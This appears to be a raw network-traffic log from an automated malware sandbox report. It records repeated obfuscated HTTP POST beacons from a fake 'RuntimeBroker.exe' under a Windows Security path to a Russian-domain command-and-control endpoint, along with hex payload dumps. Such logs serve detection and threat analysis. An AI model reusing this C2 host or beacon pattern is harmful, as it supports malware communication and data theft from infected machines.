                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RtGADIbK9TvmoTHvkG0Nbbw12EtdoidXouGq5fFsK%2Fu9kbGzA3lCQNyQ0SqevlLX%2Fr9F%2BogCblY%2Fw5T%2FKAvaxgkbvho7RcUugT%2F0R1a35IEUdJyRRX2pXLwvl%2BnZ1hPKSJAZnbv"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62924a94727d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7943&min_rtt=1932&rtt_var=12747&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1368&delivery_rate=29185&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.449771104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:28.018621922 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:28.365437984 CET1056OUTData Raw: 55 50 58 57 5a 56 51 58 55 5a 54 59 51 52 55 57 58 5f 5c 5b 59 5c 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UPXWZVQXUZTYQRUWX_\[Y\R^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ X?Y"4;![%-5)X33=- '/*P',?_;4== (<#^!'^)
                                                                                                                          Jan 1, 2025 04:22:28.463829041 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:28.719640970 CET800INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:28 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ha1Dm8BBT4sCVdqrG2FHkGFKIy0jlW6gYsIuhuoN3pD6nVk1gV8H0JRIAGtMBm1zRUBBL%2Bbfxl6J7YiYhxropICyRnWiICEAeW4JYE59ZnBzUP0D0eTGSMe6Aqd5ZpLBTqoonTH1"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6297a906431a-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4365&min_rtt=2229&rtt_var=5109&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=75553&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.449772104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:28.852138996 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:29.209322929 CET1056OUTData Raw: 55 5f 5d 50 5a 59 54 59 55 5a 54 59 51 5c 55 55 58 5a 5c 5f 59 56 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_]PZYTYUZTYQ\UUXZ\_YVRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(/)X#(%_$.>)=3$B>V,44^'*U$,? *#^!'^)
                                                                                                                          Jan 1, 2025 04:22:29.314333916 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:29.580363035 CET808INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:29 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nOoTQ3l7iQuF56ssUZzxc2UZHPCOJ4xmt7kmRQCAFe1jqAja%2Fzo%2Ba9DcvRs8RGOnv2KA%2Fvw04Dhf4PLvKyD%2FzIHi16gMNg7j5L%2FwXi6qvlZwQWjSerMmIpvfciTxmsTaQFs9Mi30"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf629cee6fc354-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3336&min_rtt=1560&rtt_var=4137&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=92580&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.449773104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:29.717504025 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:30.068730116 CET1056OUTData Raw: 55 57 58 55 5f 5d 51 58 55 5a 54 59 51 5c 55 53 58 5d 5c 5c 59 55 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UWXU_]QXUZTYQ\USX]\\YUR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +5X#2%*-#0W.3?.U$/$/.+>V*#^!'^)
                                                                                                                          Jan 1, 2025 04:22:30.161346912 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:30.431643009 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:30 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bsxcAyk8q0RfQUj%2BL8s%2FmdZ0dttcQ2I%2B5f5eLAfw9qb%2FCu7w7x4t3IS7Eat9%2FFa782stxfufhc405ug2n9rDyvt%2BdKejdUAiH5D9zKKpI1bFal1HI1wVieu2sgcu8Qkv323evIv8"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62a238208c41-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1964&rtt_var=751&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=721343&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.449774104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:30.556178093 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:30.912470102 CET1056OUTData Raw: 55 53 58 57 5f 5d 51 5a 55 5a 54 59 51 5d 55 55 58 5c 5c 5c 59 51 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: USXW_]QZUZTYQ]UUX\\\YQR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^(/&#"2X!]>&'.V:$'?'<3Z/>8<$*,#^!'^)?
                                                                                                                          Jan 1, 2025 04:22:31.014807940 CET25INHTTP/1.1 100 Continue


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.449775104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:31.043497086 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:31.396672964 CET1780OUTData Raw: 55 5f 58 55 5f 59 54 5d 55 5a 54 59 51 5a 55 5d 58 5e 5c 5d 59 50 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_XU_YT]UZTYQZU]X^\]YPR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y+Y5] &%>:>X0$&V.B#'>&,,,=$?$=#^!'^)#
                                                                                                                          Jan 1, 2025 04:22:31.488051891 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:31.745470047 CET955INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:31 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VYTUZPhBwdUdu10IrGzkyMBKQLtmGZpxREu3tyZy7yMQoVn3WjjzHZtB9UmHPCN953adQ1aXurq%2Fn2%2F6nWCEo%2BceC0bzRxuNiy4oIq0abOVNz8nsF9oIfl%2BSgiPhJEe5K8A4UFw1"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62aa88901a48-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2201&min_rtt=2145&rtt_var=916&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=562837&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 51 27 5d 27 16 3f 07 3e 11 2f 2f 27 56 24 3f 0c 14 24 20 3b 01 24 2e 36 07 2d 06 34 5c 3f 05 27 13 32 03 3d 5b 21 31 31 05 25 1c 2e 5d 04 1d 25 58 3e 04 3d 07 3c 06 36 06 28 31 3c 1b 26 27 0a 04 24 37 2f 04 27 13 2a 5b 20 21 33 56 27 0d 2c 1c 28 3a 38 01 26 3d 03 0c 34 00 2e 57 0d 12 22 1e 26 3d 21 11 29 1f 20 56 22 2c 3b 1e 24 59 3c 0c 30 3f 3c 50 20 01 36 54 3d 3c 3f 01 21 27 35 12 24 2a 0d 58 21 07 26 05 22 09 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"Q']'?>//'V$?$ ;$.6-4\?'2=[!11%.]%X>=<6(1<&'$7/'*[ !3V',(:8&=4.W"&=!) V",;$Y<0?<P 6T=<?!'5$*X!&""T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.449776104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:31.176884890 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:31.521696091 CET1056OUTData Raw: 55 52 5d 53 5a 5e 51 55 55 5a 54 59 51 5a 55 55 58 52 5c 5f 59 53 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UR]SZ^QUUZTYQZUUXR\_YSRS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y)?6 >&==4&4,43"U0<?, +>*<#^!'^)#
                                                                                                                          Jan 1, 2025 04:22:31.621274948 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:31.882683039 CET806INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:31 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlW%2FNjXPkYsclmuEPF2ngU6BQ7kOv4ak%2FVdiO4KZQIEU%2Fcz3H7zxn12zrkhn6MhUCEec96IPKiRIMg1J%2Fmbc4bcrbnXcf6gE7aDLSXoA8EXK3oPW7byigvfJAZYjY6POuMAakS4R"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62ab5e427cee-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4021&min_rtt=2028&rtt_var=4747&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=81214&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.449777104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:32.008527994 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:32.365745068 CET1056OUTData Raw: 55 5f 5d 56 5a 59 54 5a 55 5a 54 59 51 5c 55 52 58 59 5c 58 59 50 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_]VZYTZUZTYQ\URXY\XYPRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ _<,*#;X%X%[*-0&4.B($<63,+/;<'=,#^!'^)
                                                                                                                          Jan 1, 2025 04:22:32.452527046 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:32.718744993 CET811INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:32 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z75HhyCwWDqqAWPgG5%2FhyqFX1%2F4dxiR3f6lpUuVa6xQ3ppWfKIQ2zgp7TGHNGggw%2B6SrFhfmLz3TOL9%2BKjsGbGdUPTDkP0t6YLbb7cngT044qGxQAXw%2FogJAm1rBeHc%2FrfstUxVF"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62b09f350f6b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2128&min_rtt=1472&rtt_var=1864&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=217261&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.449778104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:32.853231907 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:33.209285975 CET1056OUTData Raw: 55 50 5d 56 5f 5b 51 58 55 5a 54 59 51 59 55 52 58 53 5c 5c 59 5c 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UP]V_[QXUZTYQYURXS\\Y\RX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +?-\!+9[2>6*=<3".$7$?%3,'[8(\<<R>#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:33.296883106 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:33.554476976 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:33 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qjK8mWuwutp%2F8A2rEE8G32P%2FMu0wI6hU6vzO9YInjugfM6wp6tGU8FOAjd6iRxghsHzBlCAaS9FmsbBx41AF6xPVtqH09Mk9Ud%2BZZp8CD3qAGiDTv5a%2FoSBgjDaT7NM9mFzAPAwv"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62b5d90142e3-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2324&min_rtt=1745&rtt_var=1814&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=228696&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.449779104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:33.787533045 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:34.146697044 CET1056OUTData Raw: 55 56 58 5d 5f 5c 51 55 55 5a 54 59 51 5f 55 5c 58 5c 5c 5f 59 55 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVX]_\QUUZTYQ_U\X\\_YURX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?>7]%Z1Y)=#Y$.B Y$<60?8=4(.'>#^!'^)7
                                                                                                                          Jan 1, 2025 04:22:34.251357079 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:34.520267010 CET802INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:34 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OuIxJwFcbU9ylC1Qao4YVLKmgMYT6RV82y3ocIn3Q4CQyFKzRtDObviT87pmwmB7g2S3SHmlrqhZOsAbAA9C5hOy5q2bRKdGFixu4UKbQpG%2BZHlJ6p11u0LadxBk841sQ%2Btk2xv1"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62bbc9a87288-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3974&min_rtt=2154&rtt_var=4447&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=87351&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
